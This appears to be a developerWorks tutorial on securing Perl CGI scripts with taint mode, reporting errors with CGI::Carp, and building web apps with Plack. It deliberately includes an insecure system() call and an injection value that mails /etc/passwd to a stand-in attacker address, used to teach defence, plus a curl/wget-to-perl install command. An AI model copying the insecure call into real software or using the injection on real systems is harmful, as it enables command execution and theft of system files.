It sounds like an impossible prospect, but the only way to have a completely safe script is to use one that neither takes data from the outside nor passes data to an external connection or interface (such as running a command or connecting to a database). For some basic scripts, this can be perfectly reasonable.
But for the typical web application, accepting data from a form or other location, and then using that data in some form, is precisely the reason you are using a scripted solution in the first place.
Using such data could have serious consequences. For example, consider the script in Listing 1:
Listing 1. Typical script
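#!/usr/bin/perl
use strict;
use warnings;
use CGI qw/:standard/;
# Deliberately insecure: the form value reaches the shell unchecked
my $query = CGI->new();
my $email = $query->param('email');
# system() returns 0 on success, so compare against 0 before dying
system("mail $email") == 0 or die "Couldn't run mail: $?";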
The script looks harmless enough, assuming that we always get a completely valid email address. But because we are sending email using the system() function, the contents of the email address could be used to compromise the system. For example, imagine that the supplied email address was:
example@example.com; cat /etc/passwd | mail hacker@example.com
Now the email address not only contains a (possibly) valid email address but also an instruction to email somebody else your password file. The system() function opens a subshell and executes the contents. This is a major security problem.
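One way to avoid the subshell altogether, offered here as a complementary sketch rather than as part of the original script, is to pass the command and its arguments as a list. The example below uses the list form of a piped open; the running perl binary ($^X) stands in for a real mail program, and the hostile address is the hypothetical one shown above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical hostile input, taken from the example above
my $email = 'example@example.com; cat /etc/passwd | mail hacker@example.com';

# List-form pipe open: no shell is started, so ';' and '|' are not interpreted.
# $^X is the running perl binary; it stands in for a real mail program here.
open(my $child, '-|', $^X, '-e', 'print $ARGV[0]', $email)
    or die "Couldn't start child process: $!";
my $received = do { local $/; <$child> };
close($child) or die "Child process failed: $?";

# The child saw the whole string as one argument, not as two commands
print "Child received one argument: $received\n";
```

The list form only stops the shell from interpreting the value. The value itself is still untrusted and still needs to be checked before a real mail program acts on it.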
Tracking the origin of different sources of information would be difficult if it weren't for a built-in mode provided by Perl called taint mode. Taint mode is automatically enabled if Perl determines that the real and effective user or group IDs are different, or if you explicitly enable the mode by using the -T option on the command line or on the shebang line at the start of the script.
With taint mode enabled, Perl tracks where data and variables come from and how they are used, so that information that cannot be trusted does not reach insecure or dangerous operations. As the name suggests, such data is classified as being tainted.
Perl identifies tainted data as any information that comes from the command line arguments, environment variables, locale information, and certain system calls (including those accessing directory, shared memory, and system data). In addition, all data that is read from an external file is also tainted.
Tainted information cannot be used directly or indirectly in any command that invokes a subshell (including piped input/output and the system() or exec() calls), or in any command that modifies files, directories (such as writing, deleting, or renaming), or processes.
The exceptions to this rule are that arguments to print() (and derivatives) and syswrite() do not trigger a tainting error, nor do symbolic method calls or symbolic subroutine references, and hash keys are never tainted.
The tainting functionality also extends automatically to values that are suspect, even if you don't use them directly. For example, the value of the PATH environment variable is checked whenever you call system() or exec(), regardless of whether you use a tainted variable in the command line, because the command executed is subject to the value of PATH. The PATH is checked to ensure that each directory listed in the path is absolute and not writable by people other than the owner and group. This reduces the risk that a different program is run in place of the command you intended.
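A common way to satisfy the PATH check is to set the variable explicitly near the top of the script. The following is a minimal sketch; the directory list is an assumption and should be adjusted for your system.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Replace PATH with a short list of absolute directories.
# The directories are an assumption; adjust them for your system.
$ENV{PATH} = '/usr/bin:/bin';

# Remove other variables that can change how a shell behaves
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

print "PATH is now $ENV{PATH}\n";
```

Because the new value is a literal string in the script rather than something inherited from the environment, Perl does not treat it as tainted.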
Perl generates errors and stops execution if taint mode is enabled and it identifies a tainted value being used. For example, using an insecure PATH generates the following error:
Insecure $ENV{PATH} while running with -T switch at t.pl line 11
While using an insecure variable raises this error:
Insecure dependency in system while running with -T switch at t2.pl line 2
Within a typical web application, it is the user supplied data from forms that is tainted, regardless of the method used to collect the information. Data from a CGI script can be obtained either from the standard input or environment variables (depending on the HTTP method and environment used), and both these are classed as tainted sources.
To protect your script execution and ensure that you are not using insecure data, you need to be able to identify and then de-taint the information so that it is safe to use.
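In Perl, the usual way to de-taint a value is to match it against a regular expression and keep only the captured text, because captured groups are treated as untainted. The sketch below assumes a hypothetical untaint_email() helper and a deliberately strict, simplified address pattern; it is not a complete email validator.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: return a checked copy of a plausible email
# address, or undef if the input does not match the pattern.
sub untaint_email {
    my ($input) = @_;
    return unless defined $input;
    # Only the text captured by the group is handed back to the caller
    if ($input =~ /\A([A-Za-z0-9._%+-]+\@[A-Za-z0-9.-]+\.[A-Za-z]{2,})\z/) {
        return $1;
    }
    return;
}

for my $candidate ('example@example.com',
                   'example@example.com; cat /etc/passwd | mail hacker@example.com') {
    my $clean = untaint_email($candidate);
    print defined $clean ? "accepted: $clean\n" : "rejected: $candidate\n";
}
```

The pattern should describe what is allowed rather than what is forbidden. A pattern such as (.*) would also clear the taint flag, but it would check nothing.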
The normal way of reporting errors within a Perl script is to use the warn() or die() functions. You might also use the Carp module, which provides additional levels of control over the messages that you raise, particularly within modules.
An additional module, CGI::Carp, provides much of the same functionality as the Carp module. It is specially designed to be used within web scripts where you want error information to go to a specific log, rather than the default web server log (for example, one generated by Apache), or where you want the information to go to the web page in a controlled fashion.
The standard Carp module provides alternatives for the warn() and die() functions that provide more information and are friendlier in terms of providing the location of the error. When used within a module, for example, the error message includes the module name and line number.
Within the Carp module, the four main functions are carp(), croak(), cluck(), and confess(). carp() is a synonym for warn(), and croak() is like die() and also terminates the script. cluck() and confess() are like warn() and die() respectively, but provide a stack backtrace from the point where the error was raised.
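The following is a minimal sketch of carp() and croak() in use. The My::Mailer package and its send_to() function are hypothetical and exist only for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical module used only for illustration
package My::Mailer;
use Carp qw(carp croak);

sub send_to {
    my ($address) = @_;
    # croak() dies, but reports the caller's file and line
    croak "No address supplied" unless defined $address;
    # carp() warns from the caller's point of view
    carp "Address looks unusual: $address" unless $address =~ /\@/;
    return "queued $address";
}

package main;

print My::Mailer::send_to('example@example.com'), "\n";

# Trap the fatal error so the script can continue
my $ok = eval { My::Mailer::send_to(); 1 };
print "Caught: $@" unless $ok;
```

The message caught in $@ names the line in the main script where send_to() was called, not the line inside the module, which is usually where the mistake needs to be fixed.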
If you use both the Carp and CGI::Carp modules, then the standard functions, such as warn() and die(), and the Carp module functions croak(), confess(), and carp() write their error information to the configured HTTP server log with a date/time stamp and script source.
An alternative to using the HTTP server error log is to use CGI::Carp and make use of the carpout() function. This accepts a single argument, the filehandle of the file where you want errors (normally sent to STDERR) to be written. You must explicitly import the carpout() function. You can see a simple example in Listing 2.
Listing 2. Using CGI::Carp
#!/usr/bin/perl
use strict;
use warnings;
use CGI::Carp qw/carpout/;
use IO::File;
my $logfile = IO::File->new('browser.log','w')
    or die "Couldn't open logfile: $!\n";
carpout($logfile);
warn "Some error must have occurred\n";
The information generated in the log is identified with both the date and the name of the script that generated the output:
[Thu Sep 2 11:35:56 2010] carpout.cgi: Some error must have occurred
All of these standardized methods assume that you want your error information to go to a log file. But you may not always have access to the logs, or you may not want to log in to the server to get the information.
The CGI::Carp module therefore also provides a fatalsToBrowser option that redirects fatal error messages (die(), confess()) back to the browser, as well as to the web server log. This ensures that your users see the errors generated by the script. Non-fatal errors (warn() and carp()) continue to go to the error log as normal.
To use it, you must specify it as an option when loading the CGI::Carp module: use CGI::Carp qw/fatalsToBrowser/;. We can add this to our file browsing script to ensure that errors are correctly reported and identified.
The tainting of information and the use of CGI::Carp are both low-level issues that can still be a cause for concern. However, the low-level aspects of CGI applications, such as dealing with query arguments and outputting header material, can be simplified by using one of a number of web application frameworks, such as Catalyst or Dancer. Plack works with frameworks or can be used on its own, as demonstrated below.
Plack is Perl super-glue for web frameworks and web servers. Plack sits between your code (whether you use a web framework or not) and the web server (for example, Apache, Starman, FCGI). This means that you (and your framework) do not need to worry about specifics of a web server and vice-versa.
Let's get you set up. We are going to use cpanm (from App::cpanminus) to download and install modules into your local::lib (so you do not need root access). This is shown in Listing 3.
Listing 3. Initial setup
# archive of any existing cpan configuration
mv ~/.cpan ~/.cpan_original

# Then one of the following:

# if you can run wget
wget -O - http://cpanmin.us/ | perl - local::lib App::cpanminus &&
  echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc &&
  . ~/.bashrc

# OR if you can run curl
curl -L http://cpanmin.us/ | perl - local::lib App::cpanminus &&
  echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc &&
  . ~/.bashrc

# otherwise, download the contents of http://cpanmin.us to a file
# called cpanmin.us, make it executable and then run:
./cpanmin.us local::lib App::cpanminus &&
  echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc &&
  . ~/.bashrc
Next, install the core Plack modules that are required to build web applications quickly and easily (see Listing 4 below).
Listing 4. Installing Plack with cpanminus
cpanm Task::Plack
# Please also run this as we will use it later
cpanm Plack::Middleware::TemplateToolkit
The perl5 folder in your home directory will now have all the modules you need. The next step is to create a .psgi configuration file which will allow us to return a web page (see Listing 5 below).
Listing 5. Creating a .psgi configuration file
# Tell Perl where our lib is (ALWAYS use this)
use lib "$ENV{HOME}/perl5/lib/perl5";
# ensure we declare everything correctly (ALWAYS use this)
use strict;
# Give us diagnostic warnings where possible (ALWAYS use this)
use warnings;
# Allow us to build our application
use Plack::Builder;
# A basic app
my $default_app = sub {
    my $env = shift;
    return [
        200,                                 # HTTP Status code
        [ 'Content-Type' => 'text/html' ],   # HTTP Headers,
        ["All is good"]                      # Content
    ];
};
# Return the builder
return builder {
    $default_app;
}
Save this to a file, called 1.psgi, then use the plackup command to start your web server from the command line as follows:
plackup 1.psgi. You will see:
HTTP::Server::PSGI: Accepting connections at http://SERVER_IP:5000/.
Using your web browser, go to http://SERVER_IP:5000/. If you are developing on your desktop computer, then http://localhost:5000/ will work. You should now see a page with "All is good". In fact, you will see the same thing whichever page you request (for example, http://localhost:5000/any_page.html), because we always return this response, irrespective of the request.
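To make the response depend on the request, the application can read the environment hash it is given. The sketch below calls an application by hand, without plackup, using a minimal hand-built environment; a real server supplies many more keys. PATH_INFO is the key that the PSGI specification uses for the requested path.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# A PSGI application is a code reference that takes an environment hash
my $app = sub {
    my $env = shift;
    # PATH_INFO holds the requested path
    my $path = $env->{PATH_INFO};
    return [
        200,
        [ 'Content-Type' => 'text/plain' ],
        [ "You asked for $path" ],
    ];
};

# Call the application directly with a minimal, hand-built environment
my $response = $app->({ REQUEST_METHOD => 'GET', PATH_INFO => '/any_page.html' });
my ($status, $headers, $body) = @$response;
print "$status: @$body\n";
```

Calling the code reference directly like this is also a quick way to check an application's return value before putting it behind a web server.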
You will notice that on the command line you can see the access logs for the web server. This is because Plack defaults to development mode and turns on a few extra middleware layers for you, specifically AccessLog, StackTrace and Lint.
To see StackTrace in operation, comment out the content line of Listing 5 by adding a hash (#) in front of it:
# ["All is good"] # Content.
Restart your plackup command (type Ctrl+C to stop the process, then run plackup 1.psgi to start it). Now, in your web browser go to http://localhost:5000/ again and you will see a StackTrace of the error. Note the main error message at the top of the page: "response needs to be 3 element array, or 2 element in streaming". You can then follow each step of the trace, clicking the Show function arguments and Show lexical variables links under any section of the trace to help debug the issue.
Remove the # and restart, so we have a working .psgi file again.
The plackup command accepts several command-line arguments; running perldoc plackup shows you the documentation. The most used is -r or --reload, which tells plackup to monitor your .psgi file and restart the server when it changes (if you have a lib directory alongside your .psgi file, it is also monitored): plackup -r 1.psgi.
Plack already has many useful applications that you may want to integrate with your web portal. In Listing 6, for example, we use Plack::App::Directory to get a directory listing and to serve its content as static files. We use Plack::App::URLMap to choose which URL we want to mount this application on.
Listing 6. Second .psgi configuration file
use lib "$ENV{HOME}/perl5/lib/perl5";
use strict;
use warnings;
use Plack::Builder;
# 'mount' applications on specific URLs
use Plack::App::URLMap;
# Get directory listings and serve files
use Plack::App::Directory;
my $default_app = sub {
    my $env = shift;
    return [ 200, [ 'Content-Type' => 'text/html' ], ["All is good"] ];
};
# Get the Directory app, configured with a root directory
my $dir_app = Plack::App::Directory->new( { root => "/tmp/" } )->to_app;
# Create a mapper object
my $mapper = Plack::App::URLMap->new();
# mount our apps on urls
$mapper->mount('/' => $default_app);
$mapper->mount('/tmp' => $dir_app);
# extract the new overall app from the mapper
my $app = $mapper->to_app();
# Return the builder
return builder {
    $app;
}
The code in Listing 6 mounts $dir_app on /tmp/ (open http://localhost:5000/tmp/) and still falls through to $default_app for /, that is, for any other path (open http://localhost:5000/anything_else.html).
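Plack::Builder also offers a mount keyword that performs the same URL mapping inside the builder block. The sketch below is one way to check the routing without a browser, assuming the Plack::Test and HTTP::Request::Common modules are available in your installation. The two stand-in applications are hypothetical and replace the directory listing so that the output does not depend on the contents of /tmp.

```perl
use strict;
use warnings;
use Plack::Builder;
use Plack::Test;
use HTTP::Request::Common qw(GET);

# Two trivial stand-in applications (hypothetical, for illustration)
my $default_app = sub { [ 200, [ 'Content-Type' => 'text/plain' ], ['All is good'] ] };
my $tmp_app     = sub { [ 200, [ 'Content-Type' => 'text/plain' ], ['Under /tmp'] ] };

# mount inside builder {} maps URL prefixes to applications
my $app = builder {
    mount '/tmp' => $tmp_app;
    mount '/'    => $default_app;
};

# Send requests to the application in-process, without starting a server
test_psgi $app, sub {
    my $cb = shift;
    print $cb->(GET '/tmp/')->content, "\n";
    print $cb->(GET '/anything_else.html')->content, "\n";
};
```

The first request should be answered by the application mounted on /tmp and the second by the default application.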
There are many Plack::Apps and Plack::Middleware modules available to help with common tasks. We are going to look at Plack::Middleware::TemplateToolkit, which parses files through the templating engine Template-Toolkit (TT). Images and other static content should not go through TT, so we are going to configure Plack::Middleware::Static to serve files with specific extensions directly. On top of this we want to have a nice looking page when there is a 404 (file not found); for this we will use Plack::Middleware::ErrorDocument. All the code we need to add is shown in Listing 7.
Listing 7. The Plack::Middleware::TemplateToolkit module
# Load the Template Toolkit middleware
use Plack::Middleware::TemplateToolkit;
# A link to your htdocs root folder
my $root = '/path/to/htdocs/';
# Create a new template toolkit application (which we will default to)
my $default_app = Plack::Middleware::TemplateToolkit->new(
    INCLUDE_PATH => $root,    # Required
)->to_app();
return builder {
    # Page to show when requested file is missing
    # this will not be processed with TT
    enable "Plack::Middleware::ErrorDocument",
        404 => "$root/page_not_found.html";
    # These files can be served directly; the pattern matches a dot
    # followed by one of the listed extensions at the end of the path
    enable "Plack::Middleware::Static",
        path => qr{\.(?:gif|png|jpg|swf|ico|mov|mp3|pdf|js|css)$},
        root => $root;
    # Our application
    $default_app;
}
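When a path pattern for Plack::Middleware::Static is meant to match file extensions, it is worth checking it against a few sample paths first. The sketch below compares a bracketed pattern with a grouped alternation; square brackets define a character class, so the first pattern tests only the final character of the path. The sample paths are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Square brackets form a character class: this matches any path whose
# last character is one of the listed letters, digits, or '|'
my $char_class  = qr{[gif|png|jpg|swf|ico|mov|mp3|pdf|js|css]$};

# A grouped alternation anchored on a literal dot matches whole extensions
my $alternation = qr{\.(?:gif|png|jpg|swf|ico|mov|mp3|pdf|js|css)$};

for my $path ('/images/logo.png', '/index.html', '/docs') {
    printf "%-18s class=%s alternation=%s\n", $path,
        ($path =~ $char_class  ? 'yes' : 'no'),
        ($path =~ $alternation ? 'yes' : 'no');
}
```

With the character class, a path such as /docs would be treated as static content simply because it ends in "s", and so would never reach the template engine.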
At this stage, it is probably worth investigating one of the many web frameworks that offer PSGI support and can be run with Plack. These frameworks offer structure and support for doing more complex tasks. Have a look at Catalyst, Mojolicious, or Dancer. The Perl.org web frameworks white paper (see Resources for a link) discusses just a few of the advantages of using a framework.
Parsing and using web data within a Perl web portal script is complex because of the need to secure the information that you are receiving from the user. Once you grant access to the underlying filesystem through your Perl script, you must ensure that the CGI script cannot gain access to files that you do not want accessible to the outside world.
Plack doesn't eliminate the need to worry about these elements, but it does make the process of building advanced web applications much easier. Plack handles the complexities between your web server and your Perl application and provides a simplified environment for building web applications.
Learn
- XML for Perl developers, Part 1: XML plus Perl -- simply magic (Jim Dixon, developerWorks, January 2007): This series is a guide to those who need a quick XML-and-Perl solution. In a surprisingly large number of cases, you only need one tool to integrate XML into a Perl application, XML::Simple.
- Perl developers: Fill your XML toolbox (Parand Darugar, developerWorks, June 2001): Explore an overview of some 20 essential tools and libraries for manipulating XML with Perl.
- Effective XML processing with DOM and XPath in Perl (Parand Darugar, developerWorks, October 2001): Examine how to make effective and efficient use of DOM.
- Higher-Order Perl (Mark Jason Dominus, 2005): Read a book about functional programming techniques in Perl and how to write functions that can modify and manufacture other functions.
- Visit the home of the Perl programming language.
- Learn more about Perl web frameworks.
- AIX and UNIX: The AIX and UNIX developerWorks zone provides a wealth of information relating to all aspects of AIX systems administration and expanding your UNIX skills.
- New to AIX and UNIX?: Visit the New to AIX and UNIX page to learn more about AIX and UNIX.
- Search the AIX and UNIX library by topic:
  - System administration
  - Application development
  - Performance
  - Porting
  - Security
  - Tips
  - Tools and utilities
  - Java™ technology
  - Linux®
  - Open source
- Safari bookstore: Visit this e-reference library to find specific technical resources.
- Follow developerWorks on Twitter.
- For an article series that will teach you how to program in bash, see Bash by example, Part 1: Fundamental programming in the Bourne again shell (bash) (Daniel Robbins, developerWorks, March 2000), Bash by example, Part 2: More bash programming fundamentals (Daniel Robbins, developerWorks, April 2000), and Bash by example, Part 3: Exploring the ebuild system (Daniel Robbins, developerWorks, May 2000).
- Making UNIX and Linux work together (Martin Brown, developerWorks, April 2006) is a guide to getting traditional Unix distributions and Linux working together.
- To listen to interesting interviews and discussions for software developers, check out developerWorks podcasts.
- developerWorks technical events and webcasts: Stay current with developerWorks technical events and webcasts.
Get products and technologies
- Try out IBM software for free. Download a trial version, log into an online trial, work with a product in a sandbox environment, or access it through the cloud. Choose from over 100 IBM product trials.
- Download Perl.
- Get the cpanminus tool.
- Visit the home of the Plack web application system.
- Innovate your next open source development project with IBM trial software, available for download or on DVD.
Discuss
- Participate in developerWorks blogs and get involved in the developerWorks community.

Martin Brown has been a professional writer for more than seven years. He is the author of numerous books and articles across a range of topics. His expertise spans myriad development languages and platforms -- Perl, Python, Java™, JavaScript, Basic, Pascal, Modula-2, C, C++, Rebol, Gawk, Shellscript, Windows®, Solaris, Linux, BeOS, Mac OS X and more -- as well as Web programming, systems management, and integration. He is a Subject Matter Expert (SME) for Microsoft® and regular contributor to ServerWatch.com, LinuxToday.com, and IBM developerWorks. He is also a regular blogger at Computerworld, The Apple Blog, and other sites. You can contact him through his Web site.

Leo Lapworth focuses on rapid development and finding solutions to problems. Content doesn't usually matter to him; what matters is what can be achieved and how he can make things better for company, client, and users. He mostly works with open source systems (LAMP) focusing on Perl and is an active member of the London Perl community.




